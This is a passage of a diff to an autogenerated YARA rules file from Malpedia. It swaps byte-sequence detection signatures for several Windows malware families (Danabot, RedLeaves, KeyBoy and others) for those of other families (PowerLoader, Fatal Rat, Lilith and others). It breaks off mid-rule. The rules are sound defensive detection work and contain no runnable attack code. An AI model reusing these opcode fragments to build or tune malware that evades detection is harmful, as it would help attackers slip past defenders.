+		logic_hash = "666d7127e3e5da62ea89e9776cb09bdea95055b6e6b5094287262ef9a36c1b71"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -122650,32 +122548,32 @@ rule MALPEDIA_Win_Decaf_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 488d6c2460 48c744247000000000 31c0 31c9 31d2 bb02000000 be67000000 }
-		$sequence_1 = { eb11 488d7818 488b8c2438240000 e8???????? 488b8c2470060000 48894808 833d????????00 }
-		$sequence_2 = { 44886c2446 440fb66c2464 44886c2445 440fb66c245d 44886c2444 440fb66c2466 44886c2443 }
-		$sequence_3 = { e9???????? 4983f806 754d 4c8d4301 4c39c6 7331 488d051d4d0f00 }
-		$sequence_4 = { eb14 488d7818 488b8c24081b0000 0f1f00 e8???????? 488b8c24080b0000 48894808 }
-		$sequence_5 = { e8???????? 488b0d???????? 48898c24e0000000 488d052c9c1300 e8???????? 833d????????00 750e }
-		$sequence_6 = { 488b6c2410 4883c418 c3 488d05f5bb1b00 48890424 e8???????? 450f57ff }
-		$sequence_7 = { e8???????? b911000000 4889c7 4889de 31c0 488d1d94e71700 e8???????? }
-		$sequence_8 = { e8???????? 488b442478 488b4c2470 488b942488000000 ebbd 90 488d05bfff1d00 }
-		$sequence_9 = { eb14 488d7818 488b8c2470220000 0f1f00 e8???????? 488b8c24a8030000 48894808 }
+		$sequence_0 = { 8b5d00 3bdd 7447 8d4c2414 6a00 8bc3 8b1b }
+		$sequence_1 = { 03fd ff15???????? 8b4620 85c0 7e44 33c9 8a4e1c }
+		$sequence_2 = { 40 3bc6 7cf2 6a00 }
+		$sequence_3 = { 894664 8b465c 6a00 57 8b3d???????? 6a00 }
+		$sequence_4 = { 7c02 8bc1 57 8bce 894638 e8???????? }
+		$sequence_5 = { c1e004 03c2 33d2 8a11 8d04c0 8d0443 }
+		$sequence_6 = { e8???????? 8d442418 6a04 50 8bcb e8???????? 8d4c2424 }
+		$sequence_7 = { 6a00 6880000000 6a03 6a00 6a01 8d451c 6800000080 }
+		$sequence_8 = { 56 ff95a4feffff 85c0 7412 6820030000 }
+		$sequence_9 = { 8d69f3 55 e8???????? 8bf0 55 }
 
 	condition:
-		7 of them and filesize < 7193600
+		7 of them and filesize < 106496
 }
-rule MALPEDIA_Win_Banatrix_Auto : FILE
+rule MALPEDIA_Win_Laziok_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "6974f81a-af90-539d-af3d-94a99f9a6ee8"
+		id = "79b2ce92-e42d-5fec-a687-7e4fbea19571"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.banatrix"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.banatrix_auto.yar#L1-L120"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.laziok"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.laziok_auto.yar#L1-L101"
 		license_url = "N/A"
-		logic_hash = "c6cf826d5b4f12a87f113cad069f8b787ae4fd983cd321b74f5d11035bda50a6"
+		logic_hash = "621f5999fd77cd3089a05c94f9c8d680d38cd15a4fe64826e89765eb3b0323fd"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -122689,32 +122587,30 @@ rule MALPEDIA_Win_Banatrix_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e9???????? 8b470c 85c0 74e3 }
-		$sequence_1 = { 8b45cc d16dd0 8b4dd0 8d34c8 8b0e 81e1ffffff7f 034dc8 }
-		$sequence_2 = { 0f44d0 e9???????? 7418 8b75d4 }
-		$sequence_3 = { 89c2 ebe0 0f86dc000000 8d7101 }
-		$sequence_4 = { 5f 5d c3 55 89e5 83ec28 8b4514 }
-		$sequence_5 = { 8d4101 c74424080a000000 890424 c745e400000000 e8???????? 89c6 }
-		$sequence_6 = { 894314 8b4510 897b04 c7430800000000 c7431000000000 }
-		$sequence_7 = { 010c37 ff45d0 ebcb 01fa ebb4 8b7dd0 }
-		$sequence_8 = { e8???????? 895c2408 c744240400000000 890424 e8???????? 83ec0c }
-		$sequence_9 = { 83ec10 85c0 8945d4 7542 8b45d0 c744240c04000000 c744240800300000 }
+		$sequence_0 = { 751a ff7610 ff15???????? 56 }
+		$sequence_1 = { 59 85c0 740a 8b4c240c 8b742408 8901 }
+		$sequence_2 = { 8bc6 5e c20800 55 8bec 81ec04010000 }
+		$sequence_3 = { 668945f0 8b4604 8945f4 0fb74608 }
+		$sequence_4 = { ff74240c 33f6 ff35???????? e8???????? }
+		$sequence_5 = { 668945f2 8b460c 85c0 7404 8b00 eb03 }
+		$sequence_6 = { 7513 6a00 ff7510 ff750c ff7608 ff15???????? eb3f }
+		$sequence_7 = { e8???????? 59 59 85c0 740d 3bc7 }
 
 	condition:
-		7 of them and filesize < 180224
+		7 of them and filesize < 688128
 }
-rule MALPEDIA_Win_Danabot_Auto : FILE
+rule MALPEDIA_Win_Woody_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "d405be96-12b3-5521-8438-92276494b614"
+		id = "8c748e16-00b8-5127-9604-d62e3d04f71e"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.danabot"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.danabot_auto.yar#L1-L120"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.woody"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.woody_auto.yar#L1-L131"
 		license_url = "N/A"
-		logic_hash = "d0742d8634d1bfb6b6cd9fd56080ad6a40985205234e33c349c6b1c80cbce68a"
+		logic_hash = "3fdba1a84cd03f528c200b6a293fddfa54111448f7301420a9273bbb05f0134b"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -122728,32 +122624,32 @@ rule MALPEDIA_Win_Danabot_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b701c ad 0f1f00 8b4008 }
-		$sequence_1 = { 83f838 730b ba38000000 2bd0 }
-		$sequence_2 = { 8d45f8 50 6804010000 8d85e8fdffff 50 }
-		$sequence_3 = { e8???????? 8b03 50 8b442440 }
-		$sequence_4 = { e8???????? eb0e 8d541d00 8bc6 e8???????? 83c340 8d433f }
-		$sequence_5 = { 33c9 ba44000000 e8???????? c745b844000000 33c0 8945c0 }
-		$sequence_6 = { e8???????? 50 6aff 8bc6 e8???????? 50 6a01 }
-		$sequence_7 = { 8b55f4 8d45f8 e8???????? 8b55f8 8bc7 }
-		$sequence_8 = { 6a0e 8b45f8 50 ff15???????? 84c0 7447 33c0 }
-		$sequence_9 = { e8???????? 8bd8 8b17 8bc2 85c0 7407 83e804 }
+		$sequence_0 = { 33c0 83e103 c744241004010000 f3a4 bfc0a60110 83c9ff f2ae }
+		$sequence_1 = { 8d4ddc 51 ff75e8 50 ff15???????? 85c0 0f8417010000 }
+		$sequence_2 = { 83c008 83c308 3b4510 75e7 8b4604 50 894508 }
+		$sequence_3 = { 5d 5b c20800 8b5114 8b690c 8b4910 8bc2 }
+		$sequence_4 = { ff15???????? 85c0 7404 b001 5e c3 }
+		$sequence_5 = { 83c408 85f6 751e 68ee050000 50 }
+		$sequence_6 = { 5e 83c2fc 895508 895108 5d c20400 55 }
+		$sequence_7 = { 89742458 0f8c78ffffff 8b442454 8d0c92 8b542448 5f c1e102 }
+		$sequence_8 = { 8ba880000000 85ed 0f84ae000000 8b8884000000 85c9 0f84a0000000 8b443d10 }
+		$sequence_9 = { 85c0 7447 6a10 8d45e0 6a00 50 e8???????? }
 
 	condition:
-		7 of them and filesize < 237568
+		7 of them and filesize < 409600
 }
-rule MALPEDIA_Win_Spygrace_Auto : FILE
+rule MALPEDIA_Win_Lowzero_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "3c99942d-74fe-50f1-a9c2-d735c42e0b85"
+		id = "0ac2a079-cc7d-5a01-943f-6fc6cc4cbe31"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.spygrace"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.spygrace_auto.yar#L1-L133"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lowzero"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.lowzero_auto.yar#L1-L118"
 		license_url = "N/A"
-		logic_hash = "4d1aafea2b2d6148a5221a777c3a4ed202ce4fd229ea04549615dae7ae9b5684"
+		logic_hash = "f28e102152915a4d88e2eb7305099c61405576886b21971bd223760dea8f3689"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -122767,32 +122663,71 @@ rule MALPEDIA_Win_Spygrace_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 85c0 742a 488bc5 4c8d05d90c0300 488bcd 48c1f906 83e03f }
-		$sequence_1 = { 488bc3 48397b18 7203 488b03 48894c2430 4889442428 48c744242013000000 }
-		$sequence_2 = { bb01000000 4533e4 448d4b5b 6644394c48fe 7440 483bca 731c }
-		$sequence_3 = { 488d4db0 48837dc808 480f434db0 ffd2 85c0 0f85b0010000 4d8d86a0020000 }
-		$sequence_4 = { 490f42c0 488d4dd0 48837de808 480f434dd0 4c2bc0 4c8945e0 4e8d044502000000 }
-		$sequence_5 = { 488d4d1f e8???????? 90 488b4b10 48b8ffffffffffffff7f 482bc1 4883f807 }
-		$sequence_6 = { 4c8b4110 488bf1 4d85c0 b901000000 490f45c8 488be9 }
-		$sequence_7 = { e8???????? e9???????? 49638dd0330000 e8???????? 4889442448 498bce be10000000 }
-		$sequence_8 = { 488d05bbc60200 4889442460 488d05c7c60200 4889442468 488d05cbc60200 4889442470 488d05cfc60200 }
-		$sequence_9 = { 498bc8 e8???????? 4883a31004000000 488bcb 48c783180400000f000000 c6830004000000 4883c420 }
+		$sequence_0 = { 5e 5b c70016000000 33c0 }
+		$sequence_1 = { 33c0 8be5 5d c3 e8???????? 5f 5e }
+		$sequence_2 = { 5d c3 8b4b3c 894df8 8d81f8000000 3bd0 72e0 }
+		$sequence_3 = { 2bce 894df0 8d9b00000000 8d1c31 ff7734 85c0 }
+		$sequence_4 = { 4b 75f7 8b4d0c 3b7dfc 0f8255feffff }
+		$sequence_5 = { 47 2bc8 8d4602 03c3 3b450c }
+		$sequence_6 = { 8b3e 0fb74706 3945f8 0f8c5affffff }
+		$sequence_7 = { 83fa40 7310 6a0d ff15???????? 5e 33c0 5b }
+		$sequence_8 = { 8b45f8 ff740854 51 56 }
+		$sequence_9 = { 8806 46 47 e9???????? 8bda }
+
+	condition:
+		7 of them and filesize < 433152
+}
+rule MALPEDIA_Win_Minipocket_Auto : FILE
+{
+	meta:
+		description = "autogenerated rule brought to you by yara-signator"
+		author = "Felix Bilstein - yara-signator at cocacoding dot com"
+		id = "4bfe3841-9649-5ffe-8c95-c50da79d5d8c"
+		date = "2026-01-05"
+		modified = "2026-01-06"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.minipocket"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.minipocket_auto.yar#L1-L121"
+		license_url = "N/A"
+		logic_hash = "f99d6584928c86c24bca7d34fc6463d62a033b67ff2c46d0cd8c512898739c50"
+		score = 75
+		quality = 75
+		tags = "FILE"
+		version = "1"
+		tool = "yara-signator v0.6.0"
+		signator_config = "callsandjumps;datarefs;binvalue"
+		malpedia_rule_date = "20260105"
+		malpedia_hash = "19b79e7cab4eaf532122e5b45a77dd8f6bb5cc79"
+		malpedia_version = "20251219"
+		malpedia_license = "CC BY-SA 4.0"
+		malpedia_sharing = "TLP:WHITE"
+
+	strings:
+		$sequence_0 = { 83f83b 0f87ba000000 8b7df0 8bc7 }
+		$sequence_1 = { 488364242800 4533c9 488364242000 488bc8 458d4110 }
+		$sequence_2 = { 456bc021 4403c0 ffc7 8bc7 8a0417 84c0 75eb }
+		$sequence_3 = { 4c8d9c24d0020000 498b5b18 498b7b20 498be3 }
+		$sequence_4 = { c744245492469e5a ff15???????? 488bd8 4883f8ff 0f8412010000 488364243000 488d542450 }
+		$sequence_5 = { 410fb70449 6685c0 75ea 413bd3 7419 413bd2 }
+		$sequence_6 = { eb11 0fbec0 456bc021 4403c0 ffc7 8bc7 }
+		$sequence_7 = { 498b4010 4c8b00 eb30 410fb701 }
+		$sequence_8 = { 443bc5 7421 ffc1 4983c204 3bce 72ca 33c0 }
+		$sequence_9 = { 7474 ba68000000 488d4d80 e8???????? ba18000000 c7458068000000 488d4c2460 }
 
 	condition:
-		7 of them and filesize < 865280
+		7 of them and filesize < 34816
 }
-rule MALPEDIA_Win_Combos_Auto : FILE
+rule MALPEDIA_Win_Lilith_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "cc69e396-00ed-59a2-ba11-780fc1f2665b"
+		id = "b5f168af-a3f0-50f9-b1ea-d5b831d2999b"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.combos"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.combos_auto.yar#L1-L117"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lilith"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.lilith_auto.yar#L1-L123"
 		license_url = "N/A"
-		logic_hash = "197be11859075969cf043a035f09c4b79bbdaf0b1f0ee080745a9acd79282960"
+		logic_hash = "24d3c4eccb2438b08f77ee93becbd460d6cfbdd1ec4e6b4842ec58df50e21530"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -122806,32 +122741,32 @@ rule MALPEDIA_Win_Combos_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { f3ab c1e604 aa 8d9e50120110 803b00 8bcb }
-		$sequence_1 = { 899ddcfeffff 899dd4feffff 895dfc 8b4508 }
-		$sequence_2 = { e8???????? 8b35???????? 83c408 6a0a ffd6 a1???????? }
-		$sequence_3 = { 81ec00020000 57 b93f000000 33c0 8d7c2405 }
-		$sequence_4 = { 0bc5 33c1 8b848600ffffff 0bc7 5f 5e }
-		$sequence_5 = { 6800010000 51 57 ffd6 8d542408 }
-		$sequence_6 = { 33ff 89bdccfeffff 89bdc8feffff c785a0feffff24000000 c785a4feffff03000100 c785a8feffff08000000 8d85c8feffff }
-		$sequence_7 = { 6a00 56 8b74243c 56 ffd3 83c428 }
-		$sequence_8 = { 80c120 888800190110 eb1f 83f861 }
-		$sequence_9 = { 33c0 89442418 8944241c 85db }
+		$sequence_0 = { 81784800374300 7409 ff7048 e8???????? 59 c70701000000 8bcf }
+		$sequence_1 = { 8b7d08 8bd9 33f6 0f1f00 6a00 }
+		$sequence_2 = { e8???????? 8d4dd4 e8???????? 83c418 b9???????? 50 e8???????? }
+		$sequence_3 = { 57 56 ff15???????? ff75a0 8b35???????? ffd6 ff75a4 }
+		$sequence_4 = { 33c0 663b8880974200 740d 83c002 }
+		$sequence_5 = { 8d3c85d04a4300 8b0f 85c9 740b 8d4101 f7d8 1bc0 }
+		$sequence_6 = { 8d4dd4 50 e8???????? 8d4db4 e8???????? }
+		$sequence_7 = { c7411400000000 6a00 c741140f000000 c7411000000000 68???????? 8801 }
+		$sequence_8 = { c745fc00000000 0f57c0 6a00 50 }
+		$sequence_9 = { e8???????? 8b0d???????? e8???????? eb10 ff75dc 8b35???????? ffd6 }
 
 	condition:
-		7 of them and filesize < 163840
+		7 of them and filesize < 499712
 }
-rule MALPEDIA_Win_Phantomcore_Auto : FILE
+rule MALPEDIA_Win_Powerloader_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "2be56282-528c-5044-bd7b-3727ed618862"
+		id = "c50a3558-9d40-5d02-8dcc-a013fb97306d"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.phantomcore"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.phantomcore_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.powerloader"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.powerloader_auto.yar#L1-L106"
 		license_url = "N/A"
-		logic_hash = "ee848610d848563fe98dd89814048251462308bba35e0801488bbe21ef0c4142"
+		logic_hash = "c426c342e944500b9eabe80251134c6aa09970a7034e66d9d42756bf84d7595a"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -122845,34 +122780,34 @@ rule MALPEDIA_Win_Phantomcore_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8d45d0 8d4da8 68???????? 50 e8???????? c745f001000000 8d45c0 }
-		$sequence_1 = { e9???????? 8b16 0f57c0 0f1145c8 83f803 bf03000000 0f42f8 }
-		$sequence_2 = { 8b65e8 83c50c c745f0ffffffff ff75d8 ff15???????? ff75d8 ff15???????? }
-		$sequence_3 = { c78634020000cc734b00 c7864402000018714b00 8d8648020000 50 e8???????? 83c404 c7863402000018714b00 }
-		$sequence_4 = { eb11 8975d8 50 e8???????? 83c404 89c1 8b45d8 }
-		$sequence_5 = { c745c818714b00 8d4dcc c745d000000000 c745cc00000000 c745c026f64b00 c645c401 8d45c0 }
-		$sequence_6 = { c7443a480f000000 c6443a3400 8d1c3a 83c34c 83c74c 39cb 0f8571ffffff }
-		$sequence_7 = { e8???????? 83c410 68???????? 8d852cffffff 50 e8???????? 83c408 }
-		$sequence_8 = { ff431c c7431800000000 c74344e1c94b00 b80e000000 e9???????? c745f0ffffffff 0fb64dac }
-		$sequence_9 = { ff7514 ff74240c 6a01 57 e8???????? 8b0e 8b01 }
+		$sequence_0 = { e8???????? 8b7c2430 85ed 740d }
+		$sequence_1 = { e8???????? eb22 33c9 66666666660f1f840000000000 0fb6840c30010000 }
+		$sequence_2 = { 33d2 ff15???????? 83f81f 7323 }
+		$sequence_3 = { 7441 8b5c2430 85db 741d }
+		$sequence_4 = { 8bd0 e8???????? 85ff 740c }
+		$sequence_5 = { e8???????? 0fb6d8 84c0 7514 ff15???????? }
+		$sequence_6 = { e8???????? 0fb6d8 84c0 7514 }
+		$sequence_7 = { eb22 33c9 66666666660f1f840000000000 0fb6840c30010000 }
+		$sequence_8 = { e8???????? eb22 33c9 66666666660f1f840000000000 }
+		$sequence_9 = { 33d2 c605????????00 e8???????? 0fb6c3 }
 
 	condition:
-		7 of them and filesize < 1840128
+		7 of them and filesize < 155648
 }
-rule MALPEDIA_Win_Redleaves_Auto : FILE
+rule MALPEDIA_Win_Fatal_Rat_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "b12b9704-a80b-52f8-bcf2-a2bc41cbf847"
+		id = "6ffdc4b6-3750-513f-882d-601b90060611"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.redleaves"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.redleaves_auto.yar#L1-L165"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.fatal_rat"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.fatal_rat_auto.yar#L1-L126"
 		license_url = "N/A"
-		logic_hash = "462d228f5e12ac81384499c032e83f48dca27fd714ed17b6018f4ee42f07e472"
+		logic_hash = "3b6c3f51dd6f327df47fc74ff663d2bedf14223af4a9dd48f5c4c4ee2763ed08"
 		score = 75
-		quality = 69
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -122884,41 +122819,34 @@ rule MALPEDIA_Win_Redleaves_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 57 54 53 51 7565 7279 55 }
-		$sequence_1 = { 59 89f9 8d64241c d2c0 }
-		$sequence_2 = { 8d64241c d2c0 8a01 9c }
-		$sequence_3 = { 89d0 29f8 5f 5b }
-		$sequence_4 = { 9c 894504 9c 9c }
-		$sequence_5 = { 7279 55 7365 7254 }
-		$sequence_6 = { 47 657449 7041 64647254 }
-		$sequence_7 = { 8bb6e4010000 85f6 7407 56 }
-		$sequence_8 = { 899e8c010000 66898e7c010000 89beac010000 899ea8010000 66898e98010000 b830750000 8d8e14020000 }
-		$sequence_9 = { 9c 9c 8f442420 9c }
-		$sequence_10 = { 7443 399df4fbffff 743b 7612 8b8df0fbffff 8b01 8d95f8fbffff }
-		$sequence_11 = { 6880000000 50 e8???????? 8b85a4fdffff }
-		$sequence_12 = { 85c0 7507 32c0 e9???????? 33c0 898598fdffff 399da0fdffff }
-		$sequence_13 = { 7443 8d85acfeffff 68???????? 50 }
-		$sequence_14 = { 50 53 53 c78580fdffff4a000000 }
-		$sequence_15 = { 6a0d 59 663bc8 0f84c6000000 }
-		$sequence_16 = { 54 9c 60 9c }
+		$sequence_0 = { 5d c3 55 8bec 8b4508 8b4d0c 2d00803ed5 }
+		$sequence_1 = { c3 55 8bec 81ec04020000 53 57 6a7f }
+		$sequence_2 = { 68???????? 89470c ff7508 ffd6 8b4f0c 894710 }
+		$sequence_3 = { ff15???????? 85c0 894508 0f84e9000000 8b35???????? 68???????? 50 }
+		$sequence_4 = { 8d85a4fdffff 56 50 8935???????? ff15???????? 83c40c 6a0a }
+		$sequence_5 = { 59 740d 6a00 68???????? ff15???????? c9 c3 }
+		$sequence_6 = { 83c310 ebaf 8d4dc0 c645fc01 }
+		$sequence_7 = { 57 6a00 ff7508 ffd6 }
+		$sequence_8 = { 750c 57 ff15???????? e9???????? 53 8d45fc }
+		$sequence_9 = { 50 ff15???????? ff75f4 8946f8 6a00 50 ff15???????? }
 
 	condition:
-		7 of them and filesize < 1679360
+		7 of them and filesize < 344064
 }
-rule MALPEDIA_Win_Keyboy_Auto : FILE
+rule MALPEDIA_Win_Skyplex_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "fec012ed-67a0-5990-a09f-2adc6f6d01e1"
+		id = "b9600ce3-b74e-5061-ac1d-1291ed2f5256"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.keyboy"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.keyboy_auto.yar#L1-L216"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.skyplex"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.skyplex_auto.yar#L1-L120"
 		license_url = "N/A"
-		logic_hash = "9b6870fb0f7fa4f14ee6296738101c3d20a040df4ce6327954399cd55fe9250f"
+		logic_hash = "30e30eac39bd800313b58f678b351c49e62a23e2940a68311cb3c8e508d044fd"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -122930,44 +122858,32 @@ rule MALPEDIA_Win_Keyboy_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 51 ff75d8 6a00 ff75c0 }
-		$sequence_1 = { 6a00 8945f2 8d45f8 50 6a0e }
-		$sequence_2 = { 5d c3 3b0d???????? f27502 f2c3 f2e953030000 }
-		$sequence_3 = { c705????????dbd99823 c705????????d468bcb5 c705????????2086e659 c705????????eec45abf c705????????bbee2bd1 c705????????3e20f129 }
-		$sequence_4 = { c705????????0caa6c89 c705????????a856701f c705????????597e743c c705????????0a9769e0 c705????????c4b85363 }
-		$sequence_5 = { c705????????0a9769e0 c705????????c4b85363 c705????????3abf261f c705????????890e9944 c705????????dbd99823 c705????????d468bcb5 c705????????2086e659 }
-		$sequence_6 = { 57 68cc020000 8d852cfdffff 8bf2 6a00 50 89b528fdffff }
-		$sequence_7 = { 24a0 3ca0 7518 b800080000 }
-		$sequence_8 = { 2408 f6d8 1ac0 24dd 88474e }
-		$sequence_9 = { 7207 b901000000 eb0f 3cfe 7509 }
-		$sequence_10 = { 6683f809 740a 6683f806 7404 32c9 eb02 }
-		$sequence_11 = { 7905 49 83c9f8 41 8a043e 0fbe4c8de0 3401 }
-		$sequence_12 = { 0fbe4c8de0 3401 0fbec0 0fafc8 80f185 880c3e }
-		$sequence_13 = { e8???????? 85c0 755e 83ff20 }
-		$sequence_14 = { f7d9 85db 0f44c2 23c8 }
-		$sequence_15 = { c705????????1671e665 c705????????f3106cb3 c705????????526c1ed0 c705????????5d05606c }
-		$sequence_16 = { ffd0 e9???????? bbfeffffff eb05 }
-		$sequence_17 = { 84c0 75f0 8d55ec c745ec5c417070 c745f06c655c55 }
-		$sequence_18 = { e8???????? 8b75c0 8bce 8b15???????? a3???????? e8???????? 8b15???????? }
-		$sequence_19 = { 8d46d6 99 83e23f 03c2 }
-		$sequence_20 = { ff15???????? 8bf8 c745f447646933 8d45f4 66c745f83200 50 }
-		$sequence_21 = { c745f06c655c55 8bf2 c745f470646174 66c745f86500 8a02 }
+		$sequence_0 = { 85c0 0f84c8000000 68???????? 8d8538f7ffff 50 e8???????? 83c408 }
+		$sequence_1 = { c1f805 57 8d3c85c0af4100 8b07 83e61f c1e606 03c6 }
+		$sequence_2 = { 6bc930 8975e0 8db1709c4100 8975e4 eb2a }
+		$sequence_3 = { f7bd1cf7ffff 8b849520f7ffff 50 8d8d40fbffff 51 ff15???????? }
+		$sequence_4 = { 85c0 7430 68???????? 8d8d38f7ffff 51 }
+		$sequence_5 = { 6a01 ff15???????? c78544f6ffff01000000 eb0f 8b8d44f6ffff }
+		$sequence_6 = { e8???????? 83c404 99 f7bdc0f6ffff 8b9495c4f6ffff }
+		$sequence_7 = { 33f6 33c0 0fbe84c158564100 6a07 c1f804 }
+		$sequence_8 = { 755b e8???????? 0fb6c8 85c9 }
+		$sequence_9 = { 8b02 8b4df0 51 8b502c ffd2 8945fc 837dfc00 }
 
 	condition:
-		7 of them and filesize < 2170880
+		7 of them and filesize < 262144
 }
-rule MALPEDIA_Win_Avzhan_Auto : FILE
+rule MALPEDIA_Win_Atmosphere_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "84066c6e-b6ba-5768-970d-dec408a0e7ed"
+		id = "c4a1cda9-16c6-5553-aa27-a4261bb4c5d6"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.avzhan"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.avzhan_auto.yar#L1-L111"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.atmosphere"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.atmosphere_auto.yar#L1-L110"
 		license_url = "N/A"
-		logic_hash = "a735be6148b9160f001fa1a5adca0dca85c778e318efdbf988b4428d95a16bfa"
+		logic_hash = "cdc6f699a9e6edd17b2609c792a1b077712e73bd58ad4e35ab98f645501a4fd4"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -122981,32 +122897,32 @@ rule MALPEDIA_Win_Avzhan_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { eb1d 6a02 e8???????? 83c008 }
-		$sequence_1 = { 51 8d8c2404020000 51 56 }
-		$sequence_2 = { e8???????? 83c003 33d2 0fafc6 f7742408 }
-		$sequence_3 = { c744243844000000 f3ab 8b442464 8b3d???????? }
-		$sequence_4 = { ffd7 6a00 8b542414 52 ffd3 6a0a ffd7 }
-		$sequence_5 = { 8d8c2418020000 6a00 51 6a00 ffd5 85c0 }
-		$sequence_6 = { 49 50 8bd9 e8???????? }
-		$sequence_7 = { 6a14 ff15???????? 833d????????01 75d2 }
-		$sequence_8 = { e8???????? 8bf0 6a64 81c600040000 e8???????? }
-		$sequence_9 = { 83c418 3935???????? 7450 8b942464010000 }
+		$sequence_0 = { 6a12 50 8b11 ff12 }
+		$sequence_1 = { c20400 56 57 8b7c240c 8bf1 57 ff15???????? }
+		$sequence_2 = { 56 f6d8 1bc0 57 83e002 }
+		$sequence_3 = { 894114 b001 c20400 8b4114 }
+		$sequence_4 = { 57 8bce ff502c 84c0 }
